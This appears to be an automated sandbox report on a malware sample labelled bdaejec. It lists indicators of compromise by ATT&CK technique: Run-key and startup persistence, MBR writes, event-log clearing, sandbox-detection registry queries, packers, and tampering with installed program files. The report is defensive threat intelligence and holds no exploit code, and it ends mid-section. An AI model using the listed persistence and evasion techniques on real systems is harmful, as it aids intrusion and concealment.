bdaejec | c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e

Modify Registry

T1112

Processes:

WaaSMedicAgent.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\KktXMQ.exe	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exewww.XClient.exeKktXMQ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	www.XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	KktXMQ.exe

Drops startup file 2 IoCs

Processes:

www.XClient.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\www.XClient.lnk	www.XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\www.XClient.lnk	www.XClient.exe

Executes dropped EXE 32 IoCs

Processes:

dControl.exewww.rotkit.exewww.XClient.exeKktXMQ.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exedControl.exedControl.exe

pid	process
4656	dControl.exe
740	www.rotkit.exe
3936	www.XClient.exe
5060	KktXMQ.exe
4024	dControl.exe
3948	dControl.exe
2732	dControl.exe
5008	dControl.exe
1512	dControl.exe
4276	dControl.exe
4892	dControl.exe
1580	dControl.exe
3056	dControl.exe
4344	dControl.exe
3668	dControl.exe
3144	dControl.exe
2296	dControl.exe
2448	www.XClient.exe
1384	dControl.exe
2628	dControl.exe
1196	dControl.exe
5060	dControl.exe
4376	dControl.exe
2600	dControl.exe
3852	dControl.exe
4368	dControl.exe
1852	dControl.exe
976	dControl.exe
2812	www.XClient.exe
4564	dControl.exe
592	dControl.exe
4848	dControl.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
defense_evasion

Clear Windows Event Logs
T1070.001

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

Processes:

www.XClient.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.XClient = "C:\\Users\\Public\\www.XClient.exe"	www.XClient.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

svchost.exe

description	ioc	process
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

wmiprvse.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe

flow	ioc
18	ip-api.com

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

AutoIT Executable 26 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/4656-337-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4024-360-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/2732-1428-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/3948-1498-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/5008-1638-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/1512-1819-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4276-1911-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4892-2006-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/1580-2109-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/3056-2203-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4344-2293-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/3668-2384-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/3144-2478-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/2296-2570-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/1384-2946-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/2628-3042-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/1196-3134-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/5060-3229-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4376-3320-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/2600-3409-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/3852-3498-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4368-3588-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/1852-3679-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/976-3769-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/4564-4143-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral2/memory/592-4233-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe

Drops file in System32 directory 15 IoCs

Processes:

powershell.EXEsvchost.exesvchost.exeOfficeClickToRun.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\www.XClient	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2024 set thread context of 1184 2024 powershell.EXE dllhost.exe

description	pid	process	target process
PID 2024 set thread context of 1184	2024	powershell.EXE	dllhost.exe

UPX packed file 29 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Public\dControl.exe	upx
behavioral2/memory/4656-15-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4656-337-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4024-360-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/2732-1428-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/3948-1498-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/5008-1638-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/1512-1819-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4276-1911-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4892-2006-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/1580-2109-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/3056-2203-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4344-2293-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/3668-2384-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/3144-2478-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/2296-2570-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/1384-2946-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/2628-3042-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/1196-3134-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/5060-3229-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4376-3320-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/2600-3409-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/3852-3498-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4368-3588-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/1852-3679-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/976-3769-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/4564-4143-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/592-4166-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral2/memory/592-4233-0x0000000000400000-0x00000000004CD000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

Processes:

KktXMQ.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wab.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.Brokered.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\servertool.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	KktXMQ.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wabmig.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{ACF3742B-09B5-421B-BDF2-BEE548AB1938}\chrome_installer.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaws.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Windows Mail\wab.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\3DViewer.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoadfsb.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE	KktXMQ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javac.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jjs.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE	KktXMQ.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoev.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\fmui\fmui.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	KktXMQ.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	KktXMQ.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	KktXMQ.exe

Drops file in Windows directory 5 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

www.rotkit.exedControl.exepowershell.exepowershell.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exedControl.execmd.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exedControl.exeKktXMQ.exeschtasks.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exedControl.exewww.XClient.exepowershell.exedControl.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	www.rotkit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	www.XClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	www.XClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KktXMQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	www.XClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dControl.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

mousocoreworker.exesvchost.exe

description	ioc	process
